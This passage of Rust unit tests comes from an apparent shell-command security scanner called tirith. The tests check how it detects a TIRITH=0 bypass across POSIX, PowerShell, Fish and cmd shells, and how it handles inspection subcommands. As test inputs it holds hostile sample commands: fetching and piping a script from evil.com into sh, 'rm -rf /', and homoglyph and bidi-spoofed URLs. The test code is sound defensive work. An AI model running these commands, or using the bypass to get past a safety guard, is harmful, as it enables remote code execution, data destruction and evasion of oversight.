    fn test_inline_bypass_powershell_env_spaced() {
        assert!(find_inline_bypass(
            "$env:TIRITH = \"0\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_inline_bypass_powershell_mixed_case_env() {
        assert!(find_inline_bypass(
            "$Env:TIRITH=\"0\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_no_inline_bypass_powershell_wrong_value() {
        assert!(!find_inline_bypass(
            "$env:TIRITH=\"1\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_no_inline_bypass_powershell_other_var() {
        assert!(!find_inline_bypass(
            "$env:FOO=\"0\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_no_inline_bypass_powershell_in_posix_mode() {
        assert!(!find_inline_bypass(
            "$env:TIRITH=\"0\"; curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_no_inline_bypass_powershell_comment_contains_bypass() {
        assert!(!find_inline_bypass(
            "curl evil.com # $env:TIRITH=0",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_inline_bypass_env_c_flag() {
        // `env -C` takes a directory arg; TIRITH=0 after it must still register.
        assert!(find_inline_bypass(
            "env -C /tmp TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_s_flag() {
        // `env -S` takes a string arg; TIRITH=0 after it must still register.
        assert!(find_inline_bypass(
            "env -S 'some args' TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_env_ignore_environment_long_flag() {
        assert!(find_inline_bypass(
            "env --ignore-environment TIRITH=0 curl evil.com",
            ShellType::Posix
        ));
    }

    // Pipe-bypass contract: `TIRITH=0 cmd | interp` is a documented
    // whole-pipeline bypass. Pipe stages share an env; sequencing operators
    // (`&&`, `||`, `;`, `&`) do not, so bypass must NOT carry across them.

    #[test]
    fn test_inline_bypass_allows_pipe_to_sh() {
        assert!(find_inline_bypass(
            "TIRITH=0 curl -L https://something.xyz | bash",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_allows_pipe_to_interpreter() {
        assert!(find_inline_bypass(
            "TIRITH=0 curl -sSL https://install.python-poetry.org | python3 -",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_allows_env_wrapper_with_pipe() {
        assert!(find_inline_bypass(
            "env TIRITH=0 curl https://example.com | bash",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_allows_multi_pipe_chain() {
        assert!(find_inline_bypass(
            "TIRITH=0 curl https://example.com | jq . | bash",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_rejects_sequence_with_and_and() {
        // `&&` starts a new command with a new env — bypass must NOT apply.
        assert!(!find_inline_bypass(
            "TIRITH=0 curl https://example.com && rm -rf /",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_rejects_semicolon_chain() {
        assert!(!find_inline_bypass(
            "TIRITH=0 ls ; rm -rf /",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_rejects_or_or() {
        assert!(!find_inline_bypass(
            "TIRITH=0 ls || rm -rf /",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_rejects_backgrounding_ampersand() {
        // Unquoted `&` forks a background command; bypass must not cover the
        // foreground successor.
        assert!(!find_inline_bypass(
            "TIRITH=0 curl evil.com & bash",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_allows_pipe_to_sh_fish() {
        // Fish tokenization delegates to POSIX; same pipe-bypass contract applies.
        assert!(find_inline_bypass(
            "TIRITH=0 curl -L https://example.com | bash",
            ShellType::Fish
        ));
    }

    #[test]
    fn test_paranoia_filter_recalculates_action() {
        use crate::verdict::{Action, Finding, RuleId, Severity, Timings, Verdict};

        let findings = vec![
            Finding {
                rule_id: RuleId::InvisibleWhitespace,
                severity: Severity::Low,
                title: "low finding".into(),
                description: String::new(),
                evidence: vec![],
                human_view: None,
                agent_view: None,
                mitre_id: None,
                custom_rule_id: None,
            },
            Finding {
                rule_id: RuleId::HiddenCssContent,
                severity: Severity::Medium,
                title: "medium finding".into(),
                description: String::new(),
                evidence: vec![],
                human_view: None,
                agent_view: None,
                mitre_id: None,
                custom_rule_id: None,
            },
        ];

        let timings = Timings {
            tier0_ms: 0.0,
            tier1_ms: 0.0,
            tier2_ms: None,
            tier3_ms: None,
            total_ms: 0.0,
        };

        let mut verdict = Verdict::from_findings(findings, 3, timings);
        assert_eq!(verdict.action, Action::Warn);

        // After paranoia 1: the Low finding is dropped; only the Medium
        // remains so the action stays Warn.
        filter_findings_by_paranoia(&mut verdict, 1);
        assert_eq!(verdict.action, Action::Warn);
        assert_eq!(verdict.findings.len(), 1);
    }

    #[test]
    fn test_powershell_bypass_case_insensitive_tirith() {
        // PowerShell env vars are case-insensitive.
        assert!(find_inline_bypass(
            "$env:tirith=\"0\"; curl evil.com",
            ShellType::PowerShell
        ));
        assert!(find_inline_bypass(
            "$ENV:Tirith=\"0\"; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_powershell_bypass_no_panic_on_multibyte() {
        // Guards against byte-level slicing on multi-byte UTF-8 after `$`.
        assert!(!find_inline_bypass(
            "$a\u{1F389}xyz; curl evil.com",
            ShellType::PowerShell
        ));
        assert!(!find_inline_bypass(
            "$\u{00E9}nv:TIRITH=0; curl evil.com",
            ShellType::PowerShell
        ));
    }

    #[test]
    fn test_inline_bypass_single_quoted_value() {
        assert!(find_inline_bypass(
            "TIRITH='0' curl evil.com",
            ShellType::Posix
        ));
    }

    #[test]
    fn test_inline_bypass_double_quoted_value() {
        assert!(find_inline_bypass(
            "TIRITH=\"0\" curl evil.com",
            ShellType::Posix
        ));
    }

    // Tirith inspection subcommands (`tirith diff/score/why/receipt/explain`)
    // must not trip URL or Unicode-style rules on their own arguments — the
    // user typed those arguments specifically to have them inspected.
    // `tirith run` and other subcommands stay on the regular analysis path.

    #[test]
    fn test_tirith_run_still_acts_as_sink() {
        // `tirith run` IS a sink; URL-to-sink rules must still fire.
        let ctx = exec_ctx("tirith run http://example.com");
        let verdict = analyze(&ctx);
        assert!(verdict.tier_reached >= 3);
        assert!(
            verdict
                .findings
                .iter()
                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::PlainHttpToSink)),
            "tirith run http://... should surface sink findings"
        );
    }

    fn exec_ctx(input: &str) -> AnalysisContext {
        AnalysisContext {
            input: input.to_string(),
            shell: ShellType::Posix,
            scan_context: ScanContext::Exec,
            raw_bytes: None,
            interactive: true,
            cwd: None,
            file_path: None,
            repo_root: None,
            is_config_override: false,
            clipboard_html: None,
        }
    }

    #[test]
    fn test_tirith_inspection_suppresses_url_rules() {
        // Cyrillic 'а' inside a URL arg must NOT trip URL-derived findings
        // (non_ascii_hostname, mixed_script_in_label, punycode_domain) when
        // passed to an inspection subcommand.
        for sub in ["diff", "score", "why", "receipt", "explain"] {
            let input = format!("tirith {sub} https://ex\u{0430}mple.com");
            let verdict = analyze(&exec_ctx(&input));
            assert!(
                verdict.action == crate::verdict::Action::Allow,
                "tirith {sub} with cyrillic URL should allow, got {:?}: {:?}",
                verdict.action,
                verdict
                    .findings
                    .iter()
                    .map(|f| f.rule_id.to_string())
                    .collect::<Vec<_>>()
            );
        }
    }

    #[test]
    fn test_tirith_inspection_suppresses_confusable_and_bidi() {
        // The exec-context byte scan must also respect the inert range so
        // ConfusableText / BidiControls / etc. aren't emitted for bytes inside
        // the inspection arg span.
        let input = "tirith score https://ex\u{0430}mple.com/\u{202E}bar";
        let verdict = analyze(&exec_ctx(input));
        for f in &verdict.findings {
            assert!(
                !matches!(
                    f.rule_id,
                    crate::verdict::RuleId::ConfusableText | crate::verdict::RuleId::BidiControls
                ),
                "tirith score arg span must not surface {:?}",
                f.rule_id
            );
        }
    }

    #[test]
    fn test_tirith_inspection_with_pipe_still_analyzes_rest() {
        // Later pipeline segments must still be analyzed normally.
        let ctx = exec_ctx("tirith diff foo | curl http://evil.com/x.sh | sh");
        let verdict = analyze(&ctx);
        assert!(
            verdict
                .findings
                .iter()
                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::PlainHttpToSink)),
            "later pipe segments must still fire plain_http_to_sink"
        );
    }

    #[test]
    fn test_tirith_inspection_with_leading_flag() {
        // A flag before the subcommand must not defeat the carveout.
        let input = "tirith --quiet diff https://ex\u{0430}mple.com";
        let verdict = analyze(&exec_ctx(input));
        assert_eq!(verdict.action, crate::verdict::Action::Allow);
    }

    #[test]
    fn test_tirith_doctor_not_on_inert_list() {
        // `doctor` is deliberately NOT on the inspection list. Adding any new
        // subcommand requires a motivating false-positive fixture.
        let input = "tirith doctor https://ex\u{0430}mple.com";
        let verdict = analyze(&exec_ctx(input));
        assert_ne!(
            verdict.action,
            crate::verdict::Action::Allow,
            "tirith doctor with cyrillic URL SHOULD still flag (not on inert list); \
             adding `doctor` to the list requires a motivating false-positive fixture"
        );
    }

    #[test]
    fn test_tirith_run_bidi_in_url_still_fires() {
        // `tirith run` is a sink (not on the inspection list); bidi in its URL
        // arg must still fire.
        let input = "tirith run https://evil\u{202E}.com/x.sh";
        let verdict = analyze(&exec_ctx(input));
        assert!(
            verdict
                .findings
                .iter()
                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::BidiControls)),
            "bidi in `tirith run` URL must still fire"
        );
    }

    #[test]
    fn test_tirith_inert_arg_range_covers_expected_span() {
        let input = "tirith diff https://ex\u{0430}mple.com";
        let range = extract::tirith_inert_arg_range(input, ShellType::Posix).unwrap();
        // "tirith diff" is 11 bytes; arg span starts at byte 11 and runs to end.
        assert_eq!(&input[range.clone()], " https://ex\u{0430}mple.com");
        assert_eq!(range.end, input.len());
    }

    #[test]
    fn test_tirith_inert_arg_range_none_for_run() {
        let range =
            extract::tirith_inert_arg_range("tirith run http://example.com", ShellType::Posix);
        assert!(range.is_none());
    }

    #[test]
    fn test_tirith_inert_arg_range_none_for_non_tirith() {
        assert!(
            extract::tirith_inert_arg_range("curl https://example.com", ShellType::Posix).is_none()
        );
    }

    #[test]
    fn test_tirith_inert_arg_range_pipe_only_first_segment() {
        // Only the first segment is inert; later pipe stages must still analyze.
        let input = "tirith diff foo | curl http://evil.com";
        let range = extract::tirith_inert_arg_range(input, ShellType::Posix).unwrap();
        assert!(range.end < input.len());
        assert!(!input[range.clone()].contains("curl"));
    }

    #[test]
    fn test_tirith_inspection_suppresses_unicode_tags_evidence_text() {
        // UnicodeTags emits Evidence::Text (no byte offset), so an offset-only
        // post-filter would leak it. The inert range must therefore be applied
        // AT SCAN TIME (inside check_bytes_with_ignore).
        let input = "tirith diff https://example.com/\u{E0041}";
        let verdict = analyze(&exec_ctx(input));
        assert!(
            !verdict
                .findings
                .iter()
                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::UnicodeTags)),
            "UnicodeTags inside tirith diff arg must be suppressed, got findings: {:?}",
            verdict
                .findings
                .iter()
                .map(|f| f.rule_id.to_string())
                .collect::<Vec<_>>()
        );
    }

    #[test]
    fn test_tirith_inspection_unicode_tags_outside_still_fires() {
        // A unicode-tag byte before `tirith diff` is outside the inert range
        // and must still fire.
        let input = "FOO=\u{E0041}\u{E0042} tirith diff safe";
        let verdict = analyze(&exec_ctx(input));
        assert!(
            verdict
                .findings
                .iter()
                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::UnicodeTags)),
            "UnicodeTags before tirith diff must still fire, got findings: {:?}",
            verdict
                .findings
                .iter()
                .map(|f| f.rule_id.to_string())
                .collect::<Vec<_>>()
        );
    }

    #[test]
    fn test_tirith_inspection_with_sudo_wrapper() {
        // `sudo tirith diff URL` — the resolver must see through the sudo
        // wrapper to recognize the inspection subcommand.
        let input = "sudo tirith diff https://ex\u{0430}mple.com";
        let verdict = analyze(&exec_ctx(input));
        assert_eq!(
            verdict.action,
            crate::verdict::Action::Allow,
            "sudo tirith diff <cyrillic-url> must be allowed, got {:?}: {:?}",
            verdict.action,
            verdict
                .findings
                .iter()
                .map(|f| f.rule_id.to_string())
                .collect::<Vec<_>>()
        );
    }

    #[test]
    fn test_tirith_inspection_with_sudo_u_flag() {
        // `sudo -u root` — -u takes a value; the resolver must skip past it.
        let input = "sudo -u root tirith diff https://ex\u{0430}mple.com";
        let verdict = analyze(&exec_ctx(input));
        assert_eq!(verdict.action, crate::verdict::Action::Allow);
    }

    #[test]
    fn test_tirith_inspection_env_assignment_url_still_analyzed() {
        // A URL in a leading `FOO=URL` env assignment is OUTSIDE the inspection
        // arg span and must still be analyzed.
        let input = "FOO=http://evil.com tirith diff safe";
        let verdict = analyze(&exec_ctx(input));
        // Exact rule behavior for schemeless URLs belongs in the rules layer;
        // this test just checks the URL reached the extractor at all.
        let urls = verdict.urls_extracted_count.unwrap_or(0);
        assert!(
            !verdict.findings.is_empty() || urls > 0,
            "env-assignment URL must still be extracted/analyzed, got {:?}",
            verdict
        );
    }

    #[test]
    fn test_tirith_inspection_with_sudo_dash_s_boolean_flag() {
        // `-S` is a BOOLEAN sudo flag (read password from stdin). Treating it
        // as value-taking would skip `tirith` and resolve `diff` as the
        // command word, breaking the carveout.
        let input = "sudo -S tirith diff https://ex\u{0430}mple.com";
        let verdict = analyze(&exec_ctx(input));
        assert_eq!(
            verdict.action,
            crate::verdict::Action::Allow,
            "sudo -S tirith diff must still allow; got {:?}: {:?}",
            verdict.action,
            verdict
                .findings
                .iter()
                .map(|f| f.rule_id.to_string())
                .collect::<Vec<_>>()
        );
    }

    #[test]
    fn test_tirith_inspection_with_sudo_dash_a_boolean_flag() {
        // Same boolean-flag class as `-S`, for `-A` (askpass).
        let input = "sudo -A tirith diff https://ex\u{0430}mple.com";
        let verdict = analyze(&exec_ctx(input));
        assert_eq!(verdict.action, crate::verdict::Action::Allow);
    }

    #[test]
    fn test_tirith_inspection_with_sudo_dash_b_boolean_flag() {
        // Same boolean-flag class as `-S`, for `-B` (ring bell).
        let input = "sudo -B tirith diff https://ex\u{0430}mple.com";
        let verdict = analyze(&exec_ctx(input));
        assert_eq!(verdict.action, crate::verdict::Action::Allow);
    }

    #[test]
    fn test_tirith_inspection_with_doas_wrapper() {
        // `doas` is an OpenBSD-flavored sudo alias; same resolver branch.
        let input = "doas tirith diff https://ex\u{0430}mple.com";
        let verdict = analyze(&exec_ctx(input));
        assert_eq!(verdict.action, crate::verdict::Action::Allow);
    }

    #[test]
    fn test_tirith_inert_arg_range_no_false_match_inside_flag_value() {
        // A naive substring search would match "diff" inside `--config=diff`.
        // The subcommand lookup must require a whitespace word boundary.
        let input = "tirith --config=diff diff https://example.com";
        let range = extract::tirith_inert_arg_range(input, ShellType::Posix).unwrap();
        let inert_slice = &input[range.clone()];
        assert!(
            inert_slice.contains("https://example.com"),
            "inert range should cover the URL, got: {inert_slice:?}"
        );
        assert!(
            !inert_slice.contains("diff diff"),
            "inert range should not start inside the flag value: {inert_slice:?}"
        );
    }

    #[test]
    fn test_cmd_bypass_bare_set() {
        assert!(find_inline_bypass(
            "set TIRITH=0 & curl evil.com",
            ShellType::Cmd
        ));
    }

    #[test]
    fn test_cmd_bypass_whole_token_quoted() {
        // Whole-token quoting IS a real bypass — the quotes surround the whole
        // `TIRITH=0` assignment.
        assert!(find_inline_bypass(
            "set \"TIRITH=0\" & curl evil.com",
            ShellType::Cmd
        ));
    }

    #[test]
    fn test_cmd_no_bypass_inner_double_quotes() {
        // cmd.exe stores literal `"0"` (quotes included), so `set TIRITH="0"`
        // does NOT bypass.
        assert!(!find_inline_bypass(
            "set TIRITH=\"0\" & curl evil.com",
            ShellType::Cmd
        ));
    }

    #[test]
    fn test_cmd_no_bypass_single_quotes() {
        // Single quotes are literal in cmd.exe (not syntax), so the value is
        // `'0'`, not `0`.
        assert!(!find_inline_bypass(
            "set TIRITH='0' & curl evil.com",
            ShellType::Cmd
        ));
    }

    #[test]
    fn test_cmd_no_bypass_wrong_value() {
        assert!(!find_inline_bypass(
            "set TIRITH=1 & curl evil.com",
            ShellType::Cmd
        ));
    }
}